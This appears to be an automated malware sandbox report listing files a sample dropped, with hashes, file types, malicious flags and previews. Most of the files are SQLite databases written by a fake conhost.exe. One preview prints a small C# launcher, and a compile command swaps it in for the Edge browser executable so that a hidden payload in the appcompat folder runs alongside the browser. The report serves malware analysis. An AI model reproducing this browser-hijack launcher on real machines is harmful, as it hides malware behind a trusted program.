                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):412
                                                          Entropy (8bit):5.0744968030716295
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLnD4k1HiFkD:JNVQIbSfhWLzIiFkMSfhH1CFkD
                                                          MD5:BF577EDCB4FE2CD16EBB5308CE3FA76E
                                                          SHA1:8B95D6143E029B25BBBB78B9B96EA7FB1808C5D4
                                                          SHA-256:2BDBD8F103B81DB3F9B4F9D433E76862179E812ED8DAE360249170DA4BB7594C
                                                          SHA-512:E4DA532E0FBCE58DE1D64A2CB77266BB09BD0B2C35B2F73123AC36A169CFCA61DFF4A48361F86111CE7BDC1F995A3B9642DB61E448F70CF9284E26783765A6AF
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):268
                                                          Entropy (8bit):5.10085159173431
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723f0sn:Hu7L//TRRzscQnacs
                                                          MD5:47BB785CAC8E9EB9F285E1565A1DFCC4
                                                          SHA1:B8A761B3AB4145D2736A5A5F772E8ACAAF23F9B2
                                                          SHA-256:5B40BF2E7A1B8B4087BC2AE1401CAEBA7F51C6C66F66DB9EBE1E5AC930C1ABB7
                                                          SHA-512:EF428420C239F38D28BFBBCD87561DB1B1FA386955629B54AEBAB09FB0BCDCFB2F76C7F28CB65710CC09EC6A6EBB576ABAFE6F992AA470F6BB43224D486F6ECB
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.0.cs"
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (340), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):761
                                                          Entropy (8bit):5.239397151398335
                                                          Encrypted:false
                                                          SSDEEP:12:zI/u7L//TRRzscQnacZKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/VRzstnaCKax5DqBVKVrdFAMBJj
                                                          MD5:5C92C100128C2B7B4F070C4DFCFF7E87
                                                          SHA1:CECA7074A2FC3021702A0698FDFE94D5FBEA72D8
                                                          SHA-256:0345920813C4E31800DFCB99469DAF7EE49226C862EF0977E6333A0460AB2FBE
                                                          SHA-512:8D848A05071AAEDFBB6B814377F4FB9F583BC15621E34EA55371FEF66B4BBD825A192072EA2C4C0CB0701037E73B5D4B82F4502C84149C137EEA1A84E5D484BB
                                                          Malicious:false
                                                          Preview:.C:\blockhostnet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.643856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:KPnNyMS35VE:aDOE
                                                          MD5:020B33B31E581FAC23E4A03457CA8B7F
                                                          SHA1:A2EE25C64CA16B3433CA8532F4C3653DF4C5820F
                                                          SHA-256:898994928424E34BC0E3562EB63418C058F149F2516574C371623327495CF3D4
                                                          SHA-512:4B12C63732A38004132B7B5D71B11FC6D90C5254B48103DDCCAEF673219BD128C975EECC982B7D9F92A108F42DD16F6C4E2C6146989F8B1F45228FF9F3DC1217
                                                          Malicious:false
                                                          Preview:SwezdcN3IQBFTWih7RAUjmErq
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5736960
                                                          Entropy (8bit):7.910565025661082
                                                          Encrypted:false
                                                          SSDEEP:98304:SJuJhPWclzxum6p/GuTIZULvC6LcbE6HGek94x1RK22cJfcdnidC7GpWhGrj6j:QuaAxSTZLvD6/x1R92cJUMo7xS6
                                                          MD5:52AAA8C3FD6B813B713AE05AB9E4829C
                                                          SHA1:D4AC8ADDBE5E15E867AFE58F4BBB8319395AD38E
                                                          SHA-256:0C30D4CB510304D4CE140952F8CE316056CC4BC552CEF78A81FD5301AECC1FD2
                                                          SHA-512:C39BBA95A8554F1115D0362BAD33901FD87E00D5DE7671CD48D7B537C97889882B9009A83948087CF8516A32588E4EF831531977740B17A2791CEC927934FDD8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 65%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..../.e..........#....".n...R........5........@.......................................... ..........................................>6.O.....t.,...............-.....................................................@............p4..............................text...[m.......................... ..`.rdata...<..........................@..@.data...............................@....pdata..............................@..@.'|?......3......................... ..`.h>&.........p4.....................@....SnO.....vW...4..xW.................`..h.rsrc.................W.............@..@................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
